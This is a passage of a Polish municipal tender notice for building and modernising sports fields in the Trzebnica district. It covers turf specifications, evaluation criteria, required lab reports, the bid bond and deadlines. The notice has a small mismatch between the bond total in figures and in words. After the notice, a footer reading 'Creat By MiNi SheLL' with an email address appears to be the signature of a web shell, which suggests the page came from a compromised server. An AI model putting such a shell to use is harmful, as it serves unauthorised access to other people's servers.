wielofunkcyjnych z mechanizmem naciągowym (badminton, tenis, siatkówka),<br/>iv. zakup i dostarczenie siatek do siatkówki, tenisa, bramek do piłki ręcznej;<br/>d)	ogrodzenie boisk, w tym:<br/>i. ogrodzenia z siatki na słupkach z rur stalowych o rozstawie 2,5 m i wysokości 3,0 m (zgodnie z rys. A_05),<br/>ii. brama wejściowa z furtką o wym. 2,5x2,5 m (zgodnie z rys. A_05),<br/>iii. dwa piłkochwyty o wym. 12,0x6,0 m (zgodnie z rys. A_06);<br/>e)	pozostałe wyposażenie i prace, w tym:<br/>i. zakup i montaż ławek (2 szt.), śmietnika (1 szt.), wycieraczki stalowej 150x150 cm (1 szt.) i stojaka rowerowego – 1 szt. (zgodnie z rys. A_01 i opisem w projekcie),<br/>ii. równomierne rozścielenie zdjętego uprzednio humusu na przyległym terenie, oczyszczenie nawierzchni z resztek gruzu i zanieczyszczeń, splantowanie, obsianie trawą, zwałowanie i przykrycie nasion grabiami lub wałem z kolczatką,<br/>iii. wywiezienie nadmiaru urobku,<br/>iv. obsługa geodezyjna.<br/><br/>UWAGA!!! <br/>1) Wykonawca zobowiązany jest do wykonania odkrywek w trzech wskazanych punktach istniejącej rury wodociągowej przebiegającej pod boiskiem celem dokonania inspekcji jej stanu technicznego przez przedstawicieli Zamawiającego. <br/>2) Nawierzchnia poliuretanowa oraz warstwa stabilizująca mają spełniać wymagania ujęte w dokumentacji projektowej oraz być zgodne z normą PN–EN 14877:2014 lub jej równoważną.<br/>3) Zamawiający dopuszcza jako rozwiązanie równoważne dla trawy syntetycznej produkt o następujących parametrach:<br/>•	Typ produkcji : tuftowana,<br/>•	Podkład : poliuretanowy<br/>•	Ciężar całkowity nawierzchni na m2 – min. 2 700 g<br/>•	Waga włókien na m2 – min. 1 500 g<br/>•	Rodzaj i skład włókien – włókna proste monofilowe, 100% PE,<br/>•	Grubość włókien – min. 360 mikronów<br/>•	Ilość pęczków na m2 – min. 10 000 szt.<br/>•	Ilość włókien na m2– min. 142 000 szt.<br/>•	łączenie klejone po starzeniu: min. 150 N/ 100mm<br/>•	siła wyrywania pęczka trawy po starzeniu: min. 75N<br/>•	Wysokość włókna ponad podkładem : 45mm<br/>•	Ciężar włókna (dtex) – min. 14 000<br/>•	Kolor – dwa odcienie zieleni (dwa rodzaje włókien)<br/>•	Przepuszczalność wody dla kompletnego systemu – min. 1500 mm/h<br/>•	Mata elastyczna shockpad prefabrykowana 10mm<br/><br/>3. Szczegółowy opis przedmiotu zamówienia: <br/>•	dla zadania I stanowią zapisy w § 1 i 2 wzoru umowy stanowiącego załącznik nr 4 do SWZ oraz OPZ oraz przedmiar robót stanowiący załącznik nr 1 do OPZ<br/>•	dla zadania II stanowią zapisy w § 1 i 2 wzoru umowy stanowiącego załącznik nr 4 do SWZ oraz OPZ w tym projektu, STWiOR, sporządzonych przez Jednostkę projektowania. Przedmiar robót jest materiałem pomocniczym i nie stanowi elementu opisu przedmiotu zamówienia <br/>4.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta (w przypadku dopuszczenia składania ofert<br/>częściowych - w zakresie każdego zadania oddzielnie) zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>a) „Łączna cena ofertowa brutto” – C;<br/>b) „Okres gwarancji” – G.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże, że zrealizował w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, minimum jedno zadanie, polegające na modernizacji lub budowie wielofunkcyjnego<br/>boiska o nawierzchni z trawy syntetycznej lub poliuretanowej o wartości nie mniejszej niż 300 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b) odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykazu robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik<br/>nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> • Dla Zadania I – Modernizacja boisk sportowych typu Orlik w Gminie Trzebnica: <br/>a) raport z badań przeprowadzony przez specjalistyczne laboratorium (np. Labosport lub ISA-Sport lub Sports Labs Ltd,<br/>Ercat), dotyczący oferowanego systemu tj. nawierzchni , wypełnienia EPDM z recyklingu i maty, potwierdzający zgodność jej parametrów z FIFA Quality Programme for Football Turf (edycja 2015) dla poziomu Quality Pro i Quality oraz<br/>potwierdzający minimalne parametry oferowanej trawy syntetycznej określone przez Zamawiającego,<br/>b) raport z badań laboratoryjnych przeprowadzony przez niezależne, akredytowane laboratorium dla systemu sztucznej<br/>trawy tj. nawierzchnia, wypełnia EPDM z recyklingu i maty, potwierdzający zgodność z aktualną normą EN 15330-<br/>1:2013/PN-EN 15330-1:2014-02,<br/>c) karta techniczna oferowanej nawierzchni poświadczona przez jej producenta, potwierdzająca parametry, które nie zostały<br/>potwierdzone w raportach z badań,<br/>d) aktualny certyfikat potwierdzający posiadanie przez producenta statusu FIFA PREFERRED PROVIDER (FPP) lub<br/>licencjonowanego przez FIFA<br/>e) atest PZH dla poszczególnych elementów tj. oferowanej nawierzchni, wypełnienia (piasek kwarcowy oraz EPDM z<br/>recyklingu) i maty,<br/>f) autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję,<br/>g) raport z badań testu Lisport na min. 300.000 cykli dla włókna oferowanej trawy syntetycznej przeprowadzony przez<br/>niezależne laboratorium zgodnie z normą EN 15306 „Nawierzchnie do otwartych terenów sportowych – narażenie trawy na<br/>oddziaływania” potwierdzający, że włókno po min. 300.000 cykli nie wykazuje widocznych uszkodzeń. Badanie ma być<br/>wykonane przez niezależne, akredytowane laboratorium zgodnie z ISO/IEC 17025:2018,<br/>h) sprawozdanie z badań wydane przez akredytowane laboratorium na zawartość metali ciężkich oraz wielopierścieniowych<br/>węglowodorów aromatyzowanych (WWA) w granulacie EPDM z recyklingu potwierdzających zgodność z Rozporządzeniem<br/>(WE) 1907/2006 REACH<br/>i) raport z badań przeprowadzony przez niezależne laboratorium potwierdzający, że włókno oferowanej trawy syntetycznej<br/>zgodnie z Rozporządzeniem REACH jest wolne od WWA - wielopierścieniowych węglowodorów aromatycznych (PAH –<br/>free). Raport z badań musi być wykonany przez laboratorium niezależne, akredytowane zgodnie z ISO / IEC 17025: 2018.<br/>j) raport z badań przeprowadzony przez niezależne laboratorium potwierdzające, że włókno oferowanej trawy syntetycznej<br/>spełnia wymagania normy EN 71-3 część 3: Migracja określonych pierwiastków. Raport z badań musi być wykonany przez<br/>laboratorium niezależne, akredytowane zgodnie z ISO / IEC 17025: 2018.<br/>k) kształt włókna musi być potwierdzony przez laboratorium niezależne, akredytowane zgodnie z ISO/IEC 17025:2018.<br/>• Dla zadania II – Budowa boiska wielofunkcyjnego w Skoroszowie:<br/>a) potwierdzenie z badań przeprowadzonych przez specjalistyczne laboratorium (np. LaboSport, ISA-Sport, ITB, Sports<br/>Labs Ltd lub inne) zaświadczające spełnienie wszystkich wymagań dla nawierzchni sportowej wymienionych w tabeli<br/>„Minimalne wymagania dotyczące nawierzchni poliuretanowej’’ ujętej w dokumentacji projektowej,<br/>b) potwierdzenie z badań przeprowadzonych przez specjalistyczne laboratoria (np. ITB, LaboSport, ISA-Sport, Sports Labs<br/>Ltd lub inne potwierdzające spełnienie wymagań dla systemu warstwy stabilizacyjnej zawartych w dokumentacji projektowej,<br/>c) atest higieniczny wystawiony dla oferowanego systemu nawierzchni sportowej, <br/>d) atest higieniczny wystawiony dla oferowanego systemu warstwy stabilizacyjnej,<br/>e) karta techniczna zawierająca parametry oferowanej nawierzchni poliuretanowej,<br/>f) autoryzacja producenta nawierzchni poliuretanowej wystawiona dla wykonawcy na realizowaną inwestycję. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> • Dla Zadania I – Modernizacja boisk sportowych typu Orlik w Gminie Trzebnica: <br/>a) raport z badań przeprowadzony przez specjalistyczne laboratorium (np. Labosport lub ISA-Sport lub Sports Labs Ltd,<br/>Ercat), dotyczący oferowanego systemu tj. nawierzchni , wypełnienia EPDM z recyklingu i maty, potwierdzający zgodność<br/>jej parametrów z FIFA Quality Programme for Football Turf (edycja 2015) dla poziomu Quality Pro i Quality oraz<br/>potwierdzający minimalne parametry oferowanej trawy syntetycznej określone przez Zamawiającego,<br/>b) raport z badań laboratoryjnych przeprowadzony przez niezależne, akredytowane laboratorium dla systemu sztucznej<br/>trawy tj. nawierzchnia, wypełnia EPDM z recyklingu i maty, potwierdzający zgodność z aktualną normą EN 15330-<br/>1:2013/PN-EN 15330-1:2014-02,<br/>c) karta techniczna oferowanej nawierzchni poświadczona przez jej producenta, potwierdzająca parametry, które nie zostały<br/>potwierdzone w raportach z badań,<br/>d) aktualny certyfikat potwierdzający posiadanie przez producenta statusu FIFA PREFERRED PROVIDER (FPP) lub<br/>licencjonowanego przez FIFA<br/>e) atest PZH dla poszczególnych elementów tj. oferowanej nawierzchni, wypełnienia (piasek kwarcowy oraz EPDM z<br/>recyklingu) i maty,<br/>f) autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję,<br/>g) raport z badań testu Lisport na min. 300.000 cykli dla włókna oferowanej trawy syntetycznej przeprowadzony przez<br/>niezależne laboratorium zgodnie z normą EN 15306 „Nawierzchnie do otwartych terenów sportowych – narażenie trawy na<br/>oddziaływania” potwierdzający, że włókno po min. 300.000 cykli nie wykazuje widocznych uszkodzeń. Badanie ma być<br/>wykonane przez niezależne, akredytowane laboratorium zgodnie z ISO/IEC 17025:2018,<br/>h) sprawozdanie z badań wydane przez akredytowane laboratorium na zawartość metali ciężkich oraz wielopierścieniowych<br/>węglowodorów aromatyzowanych (WWA) w granulacie EPDM z recyklingu potwierdzających zgodność z Rozporządzeniem<br/>(WE) 1907/2006 REACH<br/>i) raport z badań przeprowadzony przez niezależne laboratorium potwierdzający, że włókno oferowanej trawy syntetycznej<br/>zgodnie z Rozporządzeniem REACH jest wolne od WWA - wielopierścieniowych węglowodorów aromatycznych (PAH –<br/>free). Raport z badań musi być wykonany przez laboratorium niezależne, akredytowane zgodnie z ISO / IEC 17025: 2018.<br/>j) raport z badań przeprowadzony przez niezależne laboratorium potwierdzające, że włókno oferowanej trawy syntetycznej<br/>spełnia wymagania normy EN 71-3 część 3: Migracja określonych pierwiastków. Raport z badań musi być wykonany przez laboratorium niezależne, akredytowane zgodnie z ISO / IEC 17025: 2018.<br/>k) kształt włókna musi być potwierdzony przez laboratorium niezależne, akredytowane zgodnie z ISO/IEC 17025:2018.<br/>• Dla zadania II – Budowa boiska wielofunkcyjnego w Skoroszowie:<br/>a) potwierdzenie z badań przeprowadzonych przez specjalistyczne laboratorium (np. LaboSport, ISA-Sport, ITB, Sports<br/>Labs Ltd lub inne) zaświadczające spełnienie wszystkich wymagań dla nawierzchni sportowej wymienionych w tabeli<br/>„Minimalne wymagania dotyczące nawierzchni poliuretanowej’’ ujętej w dokumentacji projektowej,<br/>b) potwierdzenie z badań przeprowadzonych przez specjalistyczne laboratoria (np. ITB, LaboSport, ISA-Sport, Sports Labs<br/>Ltd lub inne potwierdzające spełnienie wymagań dla systemu warstwy stabilizacyjnej zawartych w dokumentacji projektowej,<br/>c) atest higieniczny wystawiony dla oferowanego systemu nawierzchni sportowej, <br/>d) atest higieniczny wystawiony dla oferowanego systemu warstwy stabilizacyjnej,<br/>e) karta techniczna zawierająca parametry oferowanej nawierzchni poliuretanowej,<br/>f) autoryzacja producenta nawierzchni poliuretanowej wystawiona dla wykonawcy na realizowaną inwestycję. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 6. Do oferty należy dołączyć:<br/>a) wypełnione wyliczenie ceny ofertowej, stanowiące załącznik nr 1 do oferty. Wyliczenie ceny ofertowej musi zostać<br/>wypełnione i załączone do oferty. Załącznik ten stanowi część oferty i nie podlega uzupełnieniu. <br/>b) oświadczenie, o którym mowa w rozdziale X pkt 1 niniejszej SWZ, stanowiące załącznik nr 3 do SWZ,<br/>c) przedmiotowe środki dowodowe, które zostały wymienione w rozdziale X pkt 3 SWZ. <br/>d) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>e) w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>przedmiotowego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów (załącznik nr 8 do SWZ),<br/>f) w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, oświadczenie<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby<br/>(załącznik nr 7 do SWZ),<br/>g) jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, w przypadku, o którym mowa w ust. 2 i 3 rozdziału IX SWZ,<br/>oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (załącznik nr 9 do SWZ),<br/>h) jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, pełnomocnictwo dla pełnomocnika do reprezentowania w<br/>postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>i) jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, oświadczenie, o którym mowa w lit. b składa każdy z<br/>Wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść wadium w wysokości:<br/>1) Dla ZADANIA I – Modernizacja dwóch obiektów sportowych typu Orlik zlokalizowanych na terenie Gminy Trzebnica - 6<br/>500,00 zł. (słownie: sześć tysięcy pięćset złotych).<br/>2) Dla ZADANIA II – Budowa boiska wielofunkcyjnego w Skoroszowie 3.500,00 zł. (słownie: trzy tysiące pięćset złotych).<br/>Łącznie dla wszystkich zadań wadium wynosi 10 000,00 zł. (słownie: dziesięć tysięcy pięćset złotych).<br/>2. Wadium może być wniesione w:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 t.j. z późn. zm.).<br/>3. Wadium w formie pieniądza wpłaca się przelewem na rachunek bankowy: Bank Spółdzielczy w Trzebnicy, nr 14 9591<br/>0004 2001 0000 4431 0005, w tytule przelewu należy wpisać: „WADIUM – ZP.271.31.2023”.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej, przy użyciu środków komunikacji elektronicznej wskazanych w rozdz. XI<br/>SWZ.<br/>5. Wadium wnosi się przed upływem terminu składania ofert. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą<br/>uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w rozdz. XIII. ust. 3 niniejszej SWZ,<br/>przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania<br/>ofert).<br/>6. Skuteczne wniesienie wadium w innej formie niż pieniądz następuje z chwilą przekazania Zamawiającemu oryginału<br/>gwarancji lub poręczenia w postaci elektronicznej za pośrednictwem środków komunikacji elektronicznej.<br/>7. Z treści gwarancji lub poręczenia winno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy PZP. Wzór gwarancji wadialnej stanowi załącznik nr 7 do SWZ.<br/>8. Zamawiający odrzuci ofertę Wykonawcy, w przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób<br/>nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy PZP.<br/>9. Okoliczności i zasady zwrotu lub zatrzymania wadium określa art. 98 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty należy załączyć:<br/>- jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, w przypadku, o którym mowa w ust. 2 i 3 rozdziału IX SWZ,<br/>oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (załącznik nr 9 do SWZ),<br/>- jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, pełnomocnictwo dla pełnomocnika do reprezentowania w<br/>postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>- jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, oświadczenie z art. 125 ust. 1 ustawy PZP składa każdy z<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania przyczyn, z powodu których będzie<br/>zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>a) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem<br/>okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego<br/>przekazania terenu budowy, konieczności zmian dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub<br/>będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,<br/>b) gdy wystąpią okoliczności uniemożliwiające prowadzenie robót, jeżeli za te okoliczności Wykonawca nie ponosi<br/>odpowiedzialności,<br/>c) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy<br/>ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają<br/>realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>d) gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji<br/>państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>Ponieważ wszystkie zmiany umowy przekraczają dopuszczalną przez system ilość znaków, pozostałe zmiany wymienione<br/>są we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-21 11:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/trzebnica na stronie dotyczącej przedmiotowego postępowania w miejscu „Formularz”, „Oferta/Wniosek Wykonawcy” dołączając do oferty wszystkie wymagane w rozdz. XV ust. 6 podpisane pliki.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-21 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com